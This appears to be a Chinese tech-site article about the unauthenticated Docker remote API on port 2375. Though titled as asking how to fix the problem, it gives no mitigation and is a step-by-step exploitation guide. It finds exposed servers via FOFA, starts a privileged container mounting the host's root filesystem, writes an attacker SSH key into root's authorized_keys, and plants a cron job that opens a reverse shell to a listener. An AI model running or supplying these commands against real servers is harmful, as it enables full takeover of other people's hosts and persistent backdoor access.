溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Docker?API未授權(quán)訪問漏洞問題怎么解決

發(fā)布時間:2023-03-31 15:03:17 來源:億速云 閱讀:311 作者:iii 欄目:開發(fā)技術(shù)

本篇內(nèi)容主要講解“Docker API未授權(quán)訪問漏洞問題怎么解決”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學(xué)習(xí)“Docker API未授權(quán)訪問漏洞問題怎么解決”吧!

因為docker賦有遠程的遠程控制,docker開放了一個tcp端口2375,如果沒有限制訪問的話,攻擊者就會通過這個端口來通過docker未授權(quán)來獲取服務(wù)器權(quán)限。

docker api未授權(quán)訪問漏洞

00x1 漏洞成因

因為docker賦有遠程的遠程控制,docker開放了一個tcp端口2375,如果沒有限制訪問的話,攻擊者就會通過這個端口來通過docker未授權(quán)來獲取服務(wù)器權(quán)限。

00x2 信息收集

FOFA中搜索port = 2375 && status_code = "404"

訪問站點2375端口,顯示

Docker?API未授權(quán)訪問漏洞問題怎么解決

訪問/info目錄,查看版本信息

Docker?API未授權(quán)訪問漏洞問題怎么解決

證明改站點存在docker未授權(quán)訪問漏洞

00x3 漏洞利用

docker -H tcp://ip ps -a 查看容器
dokcer -H tcp:// images 查看鏡像

為了獲取宿主機的權(quán)限,我們需要把宿主機的根目錄掛載到docker容器中

docker -H tcp://ip run -it  --privileged=true -v /:/mnt --entrypoint /bin/bash image-id

--privileged=true:使用該參數(shù),container內(nèi)的root擁有真正的root權(quán)限。

-v /:/mnt:將宿主機的根目錄掛載到/mnt目錄下

--entrypoint /bin/bash:指定鏡像的默認入口命令,該入口命令會在啟動容器時作為根命令執(zhí)行,所有其他傳入值作為該命令的參數(shù),用法ENTRYPOINT command param1 param2

Docker?API未授權(quán)訪問漏洞問題怎么解決

現(xiàn)在就拿到了root權(quán)限,利用方式有很多種

ssh連接
 ssh-keygen -t rsa        //生成一個ssh公鑰
 cat /root/.ssh/id_rsa.pub       //查看生成的公鑰
 echo "公鑰內(nèi)容" > /mnt/root/.ssh/authorized_keys   //寫公鑰
 ssh root@目標(biāo)ip -i id_rsa    //ssh進行連接
寫計劃任務(wù)
nc -lvvp port 		//開啟監(jiān)聽
echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" >  /mnt/var/spool/cron/root   	///反彈shell

到此,相信大家對“Docker API未授權(quán)訪問漏洞問題怎么解決”有了更深的了解,不妨來實際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進入相關(guān)頻道進行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI